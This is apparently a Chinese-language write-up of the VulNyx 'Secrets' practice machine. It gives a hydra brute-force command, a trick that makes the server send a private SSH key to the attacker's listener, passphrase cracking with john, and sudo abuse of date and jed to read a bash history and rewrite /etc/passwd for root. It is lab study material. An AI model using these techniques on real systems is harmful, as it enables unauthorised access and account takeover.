首页 靶场练习 VulNyx Medium

# 靶场搭建

下载:Secrets

Nat,IP: 192.168.1.169

# 渗透过程

# 信息初收集

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6b:36:d8:be:ac:24:39:bf:ba:a9:a7:17:e1:5e:00:f2 (RSA)
|   256 1d:20:e4:4b:a4:e7:08:71:eb:d3:41:e1:ee:94:1c:61 (ECDSA)
|_  256 e3:93:6f:b3:0b:a3:c3:0e:f7:0d:4c:b6:db:3c:ed:90 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)

80 口首页 F12 得知用户 brad

敏感目录收集: http://192.168.1.169/secrets/login_form.php

爆破: hydra -l brad -P /usr/share/wordlists/rockyou.txt 192.168.1.169 http-post-form "/secrets/MK67IT044XYGGIIWLGS9.php:user=^USER^&password=^PASS^:Invalid Credentials" -I -t 64

拿到账号密码: brad/bradley

登录进去发现一个命令执行,只能输入数字

将 IP 转换成数字格式 3232235905 ,网上有很多在线转换

监听一下网卡,发现服务器请求了本地的 6666 端口。有一条红色的 rst,ack 记录

cn 监听一下 6666 端口,重新发送一下请求,拿到了 RSA 私钥

解密,ssh 上去

┌──(root㉿kali)-[~]
└─# ssh2john id_rsa > id_rsa.hash                            
                                                                                                                                                                                                                   
┌──(root㉿kali)-[~]
└─# john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
security         (id_rsa)     
1g 0:00:00:00 DONE (2024-06-01 08:36) 100.0g/s 307200p/s 307200c/s 307200C/s qwertyui..dangerous
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                                                                                                   
┌──(root㉿kali)-[~]
└─# ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa': 
Linux secrets 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
brad@secrets:~$ id
uid=1000(brad) gid=1000(brad) grupos=1000(brad)

# 提权

brad@secrets:~$ sudo -l
Matching Defaults entries for brad on secrets:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User brad may run the following commands on secrets:
    (fabian) NOPASSWD: /usr/bin/date
brad@secrets:~$ sudo -u fabian /usr/bin/date -f /home/fabian/.bash_history
/usr/bin/date: fecha inválida «cd ~»
/usr/bin/date: fecha inválida «ls -la»
/usr/bin/date: fecha inválida «passwd fabian»
/usr/bin/date: fecha inválida «s3cr3t$$$L0v3$$
/usr/bin/date: fecha inválida «exit -y»
brad@secrets:~$
拿到 fabian 的密码
openssl 生成密码 123456 的哈希,改掉 passwd
fabian@secrets:/home/brad$ sudo -l
Matching Defaults entries for fabian on secrets:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fabian may run the following commands on secrets:
    (root) NOPASSWD: /usr/bin/jed
fabian@secrets:/home/brad$ openssl passwd
Password: 
Verifying - Password: 
aKf1ZCGGeZ0/A
fabian@secrets:/home/brad$ sudo jed /etc/passwd
fabian@secrets:/home/brad$ su root
Contraseña: 
root@secrets:/home/brad# cat /root/root.txt 
cfd58a2c97ff992fd7777c5e1baf8265